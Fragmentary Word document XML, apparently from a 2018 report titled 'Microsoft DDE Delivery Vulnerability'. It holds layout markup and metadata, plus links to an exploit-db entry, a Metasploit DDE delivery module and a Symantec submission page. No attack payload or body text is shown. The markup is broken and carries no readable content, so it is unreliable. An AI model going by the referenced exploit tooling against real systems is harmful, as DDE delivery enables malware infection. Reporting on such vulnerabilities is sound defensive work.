          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5658063B" wp14:editId="09F3DEFA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4236720" cy="2541905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="11" name="Picture 11" descr="C:\Users\sxn7443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xn7443\Desktop\Capture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254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sectPr w:rsidR="003536FB">
      <w:headerReference w:type="default" r:id="rId25"/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7002" w:rsidRDefault="007E7002" w:rsidP="00AA0743">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007E7002" w:rsidRDefault="007E7002" w:rsidP="00AA07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93"/>
      <w:gridCol w:w="8583"/>
    </w:tblGrid>
    <w:tr w:rsidR="00AB27AA">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="918" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="00AB27AA" w:rsidRDefault="00AB27AA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1B71A7" w:rsidRPr="001B71A7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AB27AA" w:rsidRDefault="00AB27AA">
          <w:pPr>
            <w:pStyle w:val="Footer"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="00AB27AA" w:rsidRDefault="00AB27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7002" w:rsidRDefault="007E7002" w:rsidP="00AA0743">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007E7002" w:rsidRDefault="007E7002" w:rsidP="00AA07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0743" w:rsidRDefault="00AA0743" w:rsidP="00091BCE">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:color w:val="4F81BD" w:themeColor="accent1"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FCD11A" wp14:editId="62EE9AC0">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="margin">
                <wp:align>center</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:align>top</wp:align>
              </wp:positionV>
              <wp:extent cx="5943600" cy="777240"/>
              <wp:effectExtent l="0" t="0" r="0" b="3810"/>
              <wp:wrapNone/>
              <wp:docPr id="59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77724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A0743" w:rsidRPr="00AA0743" w:rsidRDefault="00AA0743" w:rsidP="00AA0743">
                          <w:pPr>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:b/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00AA0743">
                            <w:rPr>
                              <w:b/>
                            </w:rPr>
                            <w:t>Microsoft DDE Delivery Vulnerability</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx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topMargin">
                <wp14:pctHeight>85000</wp14:pctHeight>
              </wp14:sizeRelV>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect id="Rectangle 4" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:468pt;height:61.2pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:1000;mso-height-percent:850;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:page;mso-width-percent:1000;mso-height-percent:850;mso-width-relative:margin;mso-height-relative:top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" fillcolor="#4f81bd [3204]" stroked="f" strokeweight="2pt">
              <v:textbox>
                <w:txbxContent>
                  <w:p w:rsidR="00AA0743" w:rsidRPr="00AA0743" w:rsidRDefault="00AA0743" w:rsidP="00AA0743">
                    <w:pPr>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:b/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="00AA0743">
                      <w:rPr>
                        <w:b/>
                      </w:rPr>
                      <w:t>Microsoft DDE Delivery Vulnerability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B911C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E8662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1269DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EA01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743"/>
    <w:rsid w:val="00044F27"/>
    <w:rsid w:val="00045CCF"/>
    <w:rsid w:val="00091BCE"/>
    <w:rsid w:val="00176652"/>
    <w:rsid w:val="00197F59"/>
    <w:rsid w:val="001B71A7"/>
    <w:rsid w:val="002130E1"/>
    <w:rsid w:val="002A4404"/>
    <w:rsid w:val="002E6C8C"/>
    <w:rsid w:val="003536FB"/>
    <w:rsid w:val="00404497"/>
    <w:rsid w:val="00445A7D"/>
    <w:rsid w:val="00457AD2"/>
    <w:rsid w:val="004A2745"/>
    <w:rsid w:val="004E2954"/>
    <w:rsid w:val="005A49ED"/>
    <w:rsid w:val="005B3EDA"/>
    <w:rsid w:val="005D20FE"/>
    <w:rsid w:val="006377B7"/>
    <w:rsid w:val="006D795E"/>
    <w:rsid w:val="006F098C"/>
    <w:rsid w:val="00753F30"/>
    <w:rsid w:val="00770F1D"/>
    <w:rsid w:val="00775CF0"/>
    <w:rsid w:val="0078482A"/>
    <w:rsid w:val="007A4E5B"/>
    <w:rsid w:val="007D4BD4"/>
    <w:rsid w:val="007E7002"/>
    <w:rsid w:val="007F57F0"/>
    <w:rsid w:val="008801C6"/>
    <w:rsid w:val="009E446B"/>
    <w:rsid w:val="009E4F00"/>
    <w:rsid w:val="00AA0743"/>
    <w:rsid w:val="00AB27AA"/>
    <w:rsid w:val="00AE06FF"/>
    <w:rsid w:val="00BE1E68"/>
    <w:rsid w:val="00C41738"/>
    <w:rsid w:val="00CA7BF9"/>
    <w:rsid w:val="00CF4088"/>
    <w:rsid w:val="00D62A9F"/>
    <w:rsid w:val="00E26B1C"/>
    <w:rsid w:val="00E27E3B"/>
    <w:rsid w:val="00F01F9E"/>
    <w:rsid w:val="00FC4DCF"/>
    <w:rsid w:val="00FF4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743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AA0743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07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74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A074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A074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53F30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91BCE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B27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7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743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AA0743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07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74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A074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A074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53F30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91BCE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B27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7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3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xploit-db.com/exploits/43338/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://submit.symantec.com/websubmit/retail.cgi" TargetMode="External"/><Relationship Id="rId26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image" Target="media/image9.emf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jpe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oleObject" Target="embeddings/oleObject1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1.jpe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hyperlink" Target="https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.emf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package" Target="embeddings/Microsoft_Word_Document1.docx"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2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IFF International Flavors and Fragrances Inc.</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2499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Sathyanarayanan Narayanan</dc:creator>
  <cp:lastModifiedBy>Sathyanarayanan Narayanan</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-06-05T13:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-05T16:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>